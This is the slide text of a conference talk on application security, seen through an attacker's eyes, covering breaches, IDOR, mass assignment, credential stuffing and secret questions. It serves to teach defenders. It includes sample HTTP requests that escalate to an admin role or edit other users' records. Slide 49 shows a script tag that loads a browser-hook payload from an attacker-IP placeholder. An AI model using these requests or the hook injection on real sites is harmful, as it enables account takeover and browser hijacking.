Video and slides synchronized, mp3 and slide download available at URL http://bit.ly/1Ny23E3. Michael Coates explores how attackers target, analyze and compromise applications. Coates discusses recent high profile compromises and deconstructs them to understand exactly what went wrong and how to prevent these weaknesses in your applications. Filmed at qconsf.com. Michael Coates is the Trust & Information Security Officer at Twitter and also a member of the global board of directors for OWASP, a nonprofit organization providing resources and communities to increase application security.

1. M I C H A E L C O AT E S , T R U S T & I N F O R M AT I O N S E C U R I T Y O F F I C E R
@ _ M W C
A P P L I C AT I O N S T H R O U G H
A N AT TA C K E R ’ S L E N S

2. InfoQ.com: News & Community Site
• 750,000 unique visitors/month
• Published in 4 languages (English, Chinese, Japanese and Brazilian
Portuguese)
• Post content from our QCon conferences
• News 15-20 / week
• Articles 3-4 / week
• Presentations (videos) 12-15 / week
• Interviews 2-3 / week
• Books 1 / month
Watch the video with slide
synchronization on InfoQ.com!
http://www.infoq.com/presentations
/security-attacker-mind

3. Purpose of QCon
- to empower software development by facilitating the spread of
knowledge and innovation
Strategy
- practitioner-driven conference designed for YOU: influencers of
change and innovation in your teams
- speakers and topics driving the evolution and innovation
- connecting and catalyzing the influencers and innovators
Highlights
- attended by more than 12,000 delegates since 2007
- held in 9 cities worldwide
Presented at QCon San Francisco
www.qconsf.com

4. Deconstructing Breaches
W H AT ’ S G O I N G W R O N G

5. CITIGROUP
200,000 RECORDS STOLEN
BREACHED:
•names
•account numbers
•e-mail addresses transaction histories
MAY, 2011

6. bank.com/viewAcct?id=684093411
Acct …411
THE ATTACK

7. bank.com/viewAcct?id=684093411
Acct …411
THE ATTACK
bank.com/viewAcct?id=684093412
?

8. bank.com/viewAcct?id=684093411
Acct …411
THE ATTACK
bank.com/viewAcct?id=684093412
Acct …412

9. One security expert familiar with the investigation wondered how the hackers could have
known to breach security by focusing on the vulnerability in the browser. “It would have
been hard to prepare for this type of vulnerability,” he said. The security expert insisted
on anonymity because the inquiry was at an early stage.
6/14/2011 nytimes.com

10. INDIRECT OBJECT REFERENCES
OWASP TOP 10
2013 #4, 2010 #4, 2007 #4, 2004 #2, 2003 —

11. "When you look at how the breaches are occurring, it's like penetration testing 101"
Alex Cox, principal research analyst at NetWitness
6/15/2011 DarkReading.com

12. APPLE & AT&T
114,000 RECORDS EXPOSED - MILITARY, TOP EXECS
BREACHED
subscribers' email addresses
Phone ICC-ID
NOVEMBER, 2012
DETAILS
• No password or token required
• XHR Request w/ User Agent for iPhone
• Predictable ICC-ID within HTTP Request —> Associated email address

13. https://www.flickr.com/photos/kalleboo/4662852294/

14. Source | “Data Breach Report”, Verizon, 2015
BREACHES & SQL VULNS
• Joomla
• Patreon
• Planned ParentHood
• Gaana Music Service
• Telstra corporate network
• World Trade Organization
• SAP - Medical App
•& more
SQL INJECTION & 2015

15. DETAILS
• Used user information gathered from multiple sources
• Automated completion of user questions through IRS Get Transcript
application
• Return: “nearly $50 million in refunds stolen before the agency spotted the
problem"
IRS
220,000+ RECORDS BREACHED
BREACHED
Taxpayer Past Returns
MAY, 2015

16. ONGOING: CREDENTIAL THEFT
231 Million Records
49 Searchable breaches
haveibeenpwned.com

17. Targeting & Exploiting Applications
T H E AT TA C K E R ’ S E Y E

18. ATTACKING THE FRONT DOOR

19. ATTACKING THE FRONT DOOR
steve@gmail.com password1
steve@gmail.com password2
steve@gmail.com password3

20. ATTACKING THE FRONT DOOR
1 User
Many Users
Single Password Guess Many Passwords Guessed
Traditional Brute Force
Easy to Detect
Password Reuse Attack
Hard to Detect
Widespread
Easy to Detect
Targeted
Hard to Detect

21. ATTACKING THE FRONT DOOR
1 User
Targeted
Many Users
Targeted
Single Password Guess Many Passwords Guessed
Traditional Brute Force
Easy to Detect
Widespread
Easy to Detect
Targeted
Hard to Detect
Password Reuse Attack
Hard to Detect

24. ATTACKING THE SIDE DOOR

25. ATTACKING THE SIDE DOOR
We ask you to type the answer twice because we don't display what you are typing -
that's so that someone can't read your question and answer over your shoulder.

26. ATTACKING THE SIDE DOOR
“secret questions are neither secure nor reliable enough to be used as a
standalone account recovery mechanism”
English Speakers: “What is your favorite food?” - 19.7% with 1 guess
Arabic Speakers: ”What’s your first teacher’s name?” - 24% with 10 guesses
Spanish Speakers: "What is your father’s middle name?” - 21% with 10 guesses
Korean Speakers: "What is your city of birth?” - 39% with 10 guesses
Korean Speakers: "What is your favorite food?” - 43% with 10 guesses
googleonlinesecurity.blogspot.com

27. FUN WITH DATA

28. FUN WITH DATA

29. FUN WITH DATA
Unchecked Redirect?
Injection? Malformed JSON?
Oracle Fusion
Hidden Field Iteration

31. Alternate App Flows?
XSS Injection Point?

33. Password Reset Token?
Multi use form?
ab, xy, zz ?

34. FUN WITH ACCESS CONTROL

35. email
username
password
email
username
password
user admin
role
ACCOUNT SIGNUP

36. email
username
password
email
username
password
role
POST /signup HTTP/1.1
Host: site.com
username=foo&email=bar@foobar.
com&password=123&role=9
POST /signup HTTP/1.1
Host: site.com
username=foo&email=bar@foobar.
com&password=123&role=3
ACCOUNT SIGNUP
user admin

37. ACCESS CONTROL
PRESENTATION | BUSINESS | DATA
site/com/viewUser?ID=551234 site/com/viewUser?ID=551235
User Info

38. permissions
usernamePOST /createAdmin HTTP/1.1
Host: site.com
username=foo&email=bar@foobar.
com&password=123&role=admin
CREATE ADMIN New Admin
ACCESS CONTROL
PRESENTATION | BUSINESS | DATA

39. name
ACCESS CONTROL
PRESENTATION | BUSINESS | DATA
site/com/editUser?ID=551234
POST /editUser HTTP/1.1
Host: site.com
ID=551234&name=Bob
Enter New Name
EDIT USER

40. name
ACCESS CONTROL
PRESENTATION | BUSINESS | DATA
site/com/editUser?ID=551234
POST /editUser HTTP/1.1
Host: site.com
ID=551235&name=Bob
Enter New Name
EDIT USER

41. DON’T FORGET THE OBVIOUS
Cross Site Scripting SQL Injection

42. The Enemy & Profit
T H R E AT S

43. POTENTIAL ADVERSARIES
Organized Crime Hacktivists Nation States

44. APP VECTORS FOR DATA BREACHES
Source | “Data Breach Report”, Verizon, 2015

45. “Paunch had more than 1,000
customers and was earning
$50,000 per month from his
illegal activity”
Source | krebsonsecurity,.com 2013
SCALABLE BLACKMARKET BUSINESSES

49. <script src=”http://<attackerIP>:3000/hook.js” type=”text/javascript”></script>

50. BLACKMARKET PRICES

53. What to do?
YO U

54. UNDERSTAND YOUR APPLICATION’S VALUE
& ADVERSARIES

55. LEARN TO HACK
OWASP Top 10
OWASP Security Shepherd
OWASP WebGoat
Bug Bounty Programs
Your Applications

56. LEARN TO DEFEND
Capture The Flag
Fix Security Bugs
OWASP Top 10
OWASP Cheat Sheets

57. M I C H A E L C O AT E S
@ _ M W C
T H A N K S

58. Watch the video with slide synchronization on
InfoQ.com!
http://www.infoq.com/presentations/security-
attacker-mind